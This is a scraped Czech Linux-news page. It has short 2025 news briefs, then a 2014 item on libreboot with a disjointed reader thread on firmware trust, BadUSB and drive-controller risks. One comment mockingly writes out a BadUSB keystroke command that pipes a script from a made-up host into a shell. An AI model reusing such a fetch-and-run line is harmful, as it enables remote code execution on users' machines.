Knihovna libpng, tj. oficiální referenční knihovna grafického formátu PNG (Portable Network Graphics), byla vydána ve verzi 1.6.51. Opraveny jsou 4 bezpečnostní chyby obsaženy ve verzích 1.6.0 (vydána 14. února 2013) až 1.6.50. Nejvážnější z chyb CVE-2025-65018 může vést ke spuštění libovolného kódu.
Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 159 (pdf).
Hru Warhammer: Vermintide 2 (ProtonDB) lze na Steamu získat zdarma napořád, když aktivaci provedete do pondělí 24. listopadu.
Virtualizační software Xen (Wikipedie) byl vydán v nové verzi 4.21. Podrobnosti v poznámkách k vydání a přehledu nových vlastností.
Evropská komise schválila český plán na poskytnutí státní pomoci v objemu 450 milionů eur (téměř 11 miliard Kč) na rozšíření výroby amerického producenta polovodičů onsemi v Rožnově pod Radhoštěm. Komise o tom informovala v dnešní tiskové zprávě. Společnost onsemi by podle ní do nového závodu v Rožnově pod Radhoštěm měla investovat 1,64 miliardy eur (téměř 40 miliard Kč).
Microsoft v příspěvku na svém blogu věnovaném open source oznámil, že textové adventury Zork I, Zork II a Zork III (Wikipedie) jsou oficiálně open source pod licencí MIT.
První prosincový týden proběhne SUSE Hack Week 25. Zaměstnanci SUSE mohou věnovat svůj pracovní čas libovolným open source projektům, například přidání AI agenta do Bugzilly, implementaci SSH v programovacím jazyce Zig nebo portaci klasických her na Linux. Připojit se může kdokoli.
Google oznámil, že Quick Share na Androidu funguje s AirDropem na iOS. Zatím na telefonech Pixel 10. Uživatelé tak mohou snadno přenášet soubory z telefonů s Androidem na iPhony a obráceně.
Byla vydána nová verze 8.5 (8.5.0) skriptovacího jazyka PHP používaného zejména k vývoji dynamických webových stránek. Přináší řadu novinek a vylepšení (URI Extension, Pipe Operator, Clone With, …). Vydána byla také příručka pro přechod z předchozích verzí.
Evropská komise zahájila tři vyšetřování týkající se cloudových platforem Amazon Web Services (AWS) a Microsoft Azure. Evropská exekutiva, která plní také funkci unijního antimonopolního orgánu, chce mimo jiné určit, zda jsou americké společnosti Microsoft a Amazon v cloudových službách takzvanými gatekeepery, tedy hráči, kteří významně ovlivňují provoz internetu a musí dle nařízení o digitálních trzích (DMA) na společném trhu
… více »Nadace pro svobodný software (FSF) informuje o projektu libreboot. Stejně jako u projektu coreboot je cílem librebootu nahradit proprietární BIOS. Libreboot jde ale ještě dál a z corebootu odstraňuje všechny proprietární bloby. Nadace dále připomíná, že v prosinci 2013 byl představen notebook Gluglug X60 s certifikací Respects Your Freedom (zprávička). Tenkrát ještě s corebootem. Coreboot byl ale časem nahrazen librebootem a notebook přejmenován z Gluglug X60 na LibreBoot X60.
Tiskni
Sdílej:
6.8.2014 14:43
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
6.8.2014 17:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:52
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
7.8.2014 21:37
mikirc | skóre: 19
| blog: MikiSoft
| Vsetín
7.8.2014 21:42
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 15:44
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
A doted sem nezjistil, za co se mi vlastne mstis. Jen me tesi, ze te to tak vytocilo.
Co tu mám předvyplněno jako nick mě fakt nijak nezaměstnává
To te muselo neco vytocit. A poradne A to je fajn.
Otazka za zlateho bludistaka: cim to je, ze nadavam zrovna tobe (hele ty jsi ten troll co porad utoci na hagaru, zejo?)?
6.8.2014 17:16
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pro koho je tohle vlastne urcene?Pro lidi, kteří potřebují lowlevel přístup k hardware a potřebují hackovat bootovací proces. A pro lidi, kteří se bojí bezpečnostních chyb v originálním firmware (schválně nepíšu backdoorů, protože ty jsou v hardware; i když třeba AntiTheft s 3G modemem otevírá netušené nové možnosti; ale anténa k tomu modemu lze odstranit pájkou).
BTW jeste mi tam jeste chybi LibreCPU (InteLibre CoreDuo ?), LibreChipset, LibreNIC, LibreUSB, a dalsi...LibreCPU a LibreChipset. Ethernet je celkem jednoduchej. USB je horší.
6.8.2014 17:18
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
7.8.2014 00:42
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud věříš čipu, tak by ta ao486 měla jít spustit klidně na parallelleNo ale furt potřebuješ proprietární Xilinxové tooly, abys vygeneroval bitstream, ne? A k samotnému formátu bitstreamu žádná dokumentace neexistuje a k čipu už vůbec ne.
).
6.8.2014 17:32
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
USB je horší.Ano, hlavne po tom, co predvedli na Black Hatu
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...
6.8.2014 18:06
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Ano, hlavne po tom, co predvedli na Black HatuMyslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota. Phantom keyboard je tady už dlouho (NSA Litoměřice vám ji umí dodat přes noc) a to reprogamování flashek je zajímavé z hlediska hackování („jak jsem flashku předělal na ovladač jaderného reaktoru“), ale z bezpečnostního mě to moc nevzrušuje. Rozumné operační systémy mají samozřejmě firewall driverů a zeptají se, než připojí nové zařízení - a když připojím flashku a systém mi napíše „Našel jsem HID vstupní zařízení, chceš ho připojit jako klávesnici?“ a „Zařízení zadalo
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
<Alt><F2> curl b.nsasumperk.cz|sh<Return>“, tak se na toho, kdo mi tu flashku dal, usměju, informaci zavedu do systému GlobalEye a tím to končí.
A že to umí emulovat síťovku? Pokud nemáte rozbitej network manager (myslím ten typ software, ne tu konkrétní implementaci, která se naneštěstí jmenuje NetworkManager), tak vám po připojení síťovky přece nebude automaticky konfigurovat její DNS.
Jeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :). Neomezené DMA do paměti to nemá (to už spíš je problém řadič, který sedí typicky na PCIe a může si vynutit bus mastering) a s daty to moc manipulovat nemůže, protože ze systému mu chodí už zašifrované bloky.
Ehm... Hard disk hackingJeste jsem zapomnel na LibreHDD, vzhledem k tomu, co za HW pohani dnesni disky a co vsechno se tam da nacpat...HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smaže - což třeba disky Seagate dělají velmi rády a nemyslím si, že by to byl zrovna backdoor :)
6.8.2014 18:26
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.8.2014 18:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
(nemám moc jiných možností jak to nabootovat).No, to ne no, leda si s sebou nosit flashku nebo SD kartu, ale vrchol praktičnosti to není...
6.8.2014 20:37
xkucf03 | skóre: 49
| blog: xkucf03
Nebo SecureBoot (kdyby tahle technologie pracovala ve prospěch uživatele). Ideálně mít právě ten coreboot/libreboot jako bezpečný startovací bod a pak z něj můžeš ověřit integritu boot sektoru, zavaděče nebo jádra.
6.8.2014 21:12
xkucf03 | skóre: 49
| blog: xkucf03
Přečteš si jeho zdrojáky a zkompiluješ si ho. Otázka je, kde vzít ten první důvěryhodný počítač, na kterém tohle udělat. Asi by šlo použít větší počet různě starých počítačů od různých výrobců a porovnat, zda výsledek je stejný. 
(že by byl ve všech stejný backdoor je nepravděpodobné)
7.8.2014 10:13
xkucf03 | skóre: 49
| blog: xkucf03
Za předpokladu, že to kontroluješ na důvěryhodném počítači1 a ten disassembler ti nekecá. Ale uznávám, že tohle je už hodně paranoidní
[1] a ten vezmeš kde?
7.8.2014 14:58
pavlix | skóre: 54
| blog: pavlix
7.8.2014 14:59
xkucf03 | skóre: 49
| blog: xkucf03
Proto jsem navrhoval radši to použití více různě starých počítačů – z nich si vyděruješ programy a porovnáš, jestli jsou díry na stejných místech.
6.8.2014 21:17
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
6.8.2014 22:50
Ruža Becelin | skóre: 40
| blog: RuzaBecelinBlog
Myslíš to BadUSB od Nohla? Osobně mi to přišlo jako slabota.Pokud se nenajde nejaky 0day v USB stacku - vzpomen si na Stuxnet, tam je jich to na nic neptalo. Ja vim, ze to bylo na Widlich, ale Linux zacina byt taky v hledacku, hlavne po tom, co prosaklo, ze NSA zameruje "technicky zdatne uzivatele", cimz nemyslim to ohledne linuxjournal.
HDD mi přijde jako zařízení, které toho moc udělat nemůže (kromě toho, že ta data smažeMuze treba misto dat zapisovat nesmysly (k cemu jsou ti zasifrovana data, kdyz je neprectes). A taky - porad je to dual-core arm s dram, coz je prostredi pro beh cehokoli (nekde jsem mel odkaz, kde se na tm pokuseli rozbehnout linux).
7.8.2014 00:39
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Pokud se nenajde nejaky 0day v USB stackuJo, to je pravda, že by se to pak dál šířilo. Spíš než přímo v USB stacku je ale podle mě mnohem (mnohem!) víc chyb v ovladačích zařízení. Zrovna včera v noci jsem ladil, proč mi nefunguje CH34xx (hint: řádek 312 a dál - what could possibly go wrong? :) a pokud jsou drivery běžně napsané tímto stylem, tak teda potěš koště. Další důvod pro driver firewalling.
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMASATA AFAIK jenom streamuje data, kam do paměti se zapíšou určuje řadič → musel by být bug tam (taky už jsem viděl řadič (VT6420), který uměl softwarově havarovat).
hint: řádek 312 a dálHehe, jaká krásná detekce NULL pointeru
(ale tady to aspoň není inline funkce, tam to je mnohem víc na pěst). Jinak ale myslím, že mnoho těch testů se neprovádí a předpokládá se, že kernel drivery jsou sane. Už třeba to vytáhnutí priv dat předpokládá validní pointer.
port_probe), takže driver může celkem spolehlivě předpokládat, že tam NULL nebude. Zjevně to není ten typ funkce, která by něco prováděla a mohla NULLem indikovat selhání, je to prostě getter.
7.8.2014 11:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
stty. A taky to při každém open() dělá znova celou inicializaci, což způsobí reset čipu a v tomto případě kvůli tomu i reset AVR, co je za ním.
a cortex m3, ktery udajne nic nedelaJe otázka zda by ten Cortex M3 stíhal zasahovat do práce těch dvou rychlých ARMů. Pořád může existovat normální firmware modul, který ho používá (ten člověk by musel dekompilovat všechny firmware moduly, aby si byl jistý). Nejspíš to bude pomocný procesor, který buď používají pro testování při provozu (ARMy "M" jsou malý). Nebo používá WD generickej čipset (seagate má tuším na zakázku).
Ten controller navic ovlada SATA interface, kde je obvykle zapnute DMA, otazka je, jestli se to neda vyuzit stejne jako Firewire, pokud ma clovek "spravny" firmware.Diskový řadič pouze posílá data na signál (od DMA řadiče nebo od CPU). IDE PRD tabulka (cílový region a délka) se klasicky nastavuje driverem. Zajímavý ale bude řešení toho SATA express portu (SATA+PCIe linka). Po PCIe se už dá zapisovat do hlavní RAM (ale to už zase bude nespíš s nějakým MMU pro PCIe).
USB je horší.Tak na USB full speed hosta jde použít PIC a nejspíš by šel bitbangovat na FPGA (blésmrt). A je dost možný, že budou existovat i nějaký phy bez integrovanýho firmware.
Dá se tady v ČR někde sehnat ten LibreBoot X60?
7.8.2014 08:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Díky za reakci. Může někdo prosím potvrdit, že má Jenda pravdu?
7.8.2014 12:20
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
Díky.
7.8.2014 19:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
jen by se asi hádali kvůli tomu librebootuNo tak se tam před reklamací vrátí původní firmware… Btw. Binary situation
7.8.2014 12:27
pavlix | skóre: 54
| blog: pavlix
7.8.2014 19:43
Jendа | skóre: 78
| blog: Jenda
| JO70FB
8.8.2014 00:01
pavlix | skóre: 54
| blog: pavlix
8.8.2014 06:24
Václav "Darm" Novák | skóre: 26
| blog: Darmovy_kecy
| Bechyně / Praha
8.8.2014 09:55
pavlix | skóre: 54
| blog: pavlix
8.8.2014 10:05
xkucf03 | skóre: 49
| blog: xkucf03
Nevíte někdo, jak je to s podporou virtualizace?
Na shop.gluglug.org.uk píší, že to má Core Duo T2400, což je podle Intelu 32-bit s podporou Intel® Virtualization Technology (VT-x) ovšem s poznámkou: This feature may not be available on all computing systems. A to jsem měl pocit, že se 32-bitové virtualizační procesory snad ani nedělaly.
8.8.2014 10:24
pavlix | skóre: 54
| blog: pavlix